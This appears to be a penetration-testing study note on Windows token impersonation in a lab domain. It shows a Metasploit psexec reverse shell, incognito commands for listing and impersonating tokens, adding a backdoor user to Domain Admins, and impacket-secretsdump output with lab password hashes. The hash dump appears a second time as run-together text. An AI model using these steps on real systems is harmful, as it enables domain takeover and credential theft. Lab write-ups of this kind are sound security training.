Token Impersonation

What are tokens?

Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.

Two types:

Delegate – Created for logging into a machine or using Remote Desktop
Impersonate – “non-interactive” such as attaching a network drive or a domain logon script

Example

We can sometimes also find admin tokens.

We can then use it to dump hashes

We can also add a new user to get more access

Exploiting Tokens

1. Get a meterpreter shell

We can use smb psexec to gain a terminal if we have credentials

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.145.141:4444 
[*] 192.168.145.139:445 - Connecting to the server...
[*] 192.168.145.139:445 - Authenticating to 192.168.145.139:445|MARVEL.local as user 'fcastle'...
[*] 192.168.145.139:445 - Selecting PowerShell target
[*] 192.168.145.139:445 - Executing the payload...
[+] 192.168.145.139:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (201798 bytes) to 192.168.145.139
[*] Meterpreter session 1 opened (192.168.145.141:4444 -> 192.168.145.139:64070) at 2025-05-21 05:13:13 -0400

meterpreter >

User must have logged in to our target machine.

2. Load INCOGNITIO module

meterpreter has some commands that can be used to impersonate tokens.

You need to load the incognitio module.

load incognito

You can type help and see the supported commands.

List tokens

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available

We can also list groups

meterpreter > list_tokens -g

Delegation Tokens Available
========================================
\
\Authentication authority asserted identity
BUILTIN\Administrators
BUILTIN\Users
MARVEL\Domain Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\LogonSessionId_0_101431
NT AUTHORITY\LogonSessionId_0_103458

Impersonate tokens

meterpreter > impersonate_token marvel\\fcastle
[+] Delegation token available
[+] Successfully impersonated user MARVEL\fcastle
meterpreter > shell
Process 7828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
marvel\fcastle

C:\Windows\system32>

If you have admin token, you can even impersonate it.

Adding a user

We can even add a user.

C:\Windows\system32>net user /add hawkeye Password1@ /domain
net user /add hawkeye Password1@ /domain
The request will be processed at a domain controller for domain MARVEL.local.

The command completed successfully.


C:\Windows\system32>net group "Domain Admins" hawkeye /ADD /DOMAIN
net group "Domain Admins" hawkeye /ADD /DOMAIN
The request will be processed at a domain controller for domain MARVEL.local.

The command completed successfully.


C:\Windows\system32>

Secrets Dump

Now we can use it to dump things.

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'MARVEL.local/hawkeye:Password1@@192.168.145.139'

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-21 09:14:56)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-21 09:26:34)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
[*] NL$KM 
 0000   09 9F C6 F6 60 EF 09 3E  30 CC 5B AA C7 AC 5A FB   ....`..>0.[...Z.
 0010   CA 61 47 50 2D 62 B1 36  D6 59 69 2F 82 CB 81 DE   .aGP-b.6.Yi/....
 0020   D8 20 BF 99 BA 90 0C 47  10 9E 8E CB F5 01 E2 F0   . .....G........
 0030   0C 9C FC 1A BF AD 66 7B  03 11 DA A4 DF CD 60 63   ......f{......`c
NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

PreviousPass the Ticket (PtT) from Linux NextLNK File Attacks

Last updated 8 months ago

┌──(kali㉿kali)-[~] └─$ impacket-secretsdump 'MARVEL.local/hawkeye:Password1@@192.168.145.139' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb::: frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: [*] Dumping cached domain logon information (domain/username:hash) MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-21 09:14:56) MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-21 09:26:34) [*] Dumping LSA Secrets [*] $MACHINE.ACC MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4 MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4 MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00 MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0::: [*] DPAPI_SYSTEM dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2 dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28 [*] NL$KM 0000 09 9F C6 F6 60 EF 09 3E 30 CC 5B AA C7 AC 5A FB ....`..>0.[...Z. 0010 CA 61 47 50 2D 62 B1 36 D6 59 69 2F 82 CB 81 DE .aGP-b.6.Yi/.... 0020 D8 20 BF 99 BA 90 0C 47 10 9E 8E CB F5 01 E2 F0 . .....G........ 0030 0C 9C FC 1A BF AD 66 7B 03 11 DA A4 DF CD 60 63 ......f{......`c NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063 [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry

hashtagWhat are tokens?

hashtagExample

hashtagExploiting Tokens

hashtag1. Get a meterpreter shell

hashtag2. Load INCOGNITIO module

hashtagList tokens

hashtagImpersonate tokens

hashtagAdding a user

hashtagSecrets Dump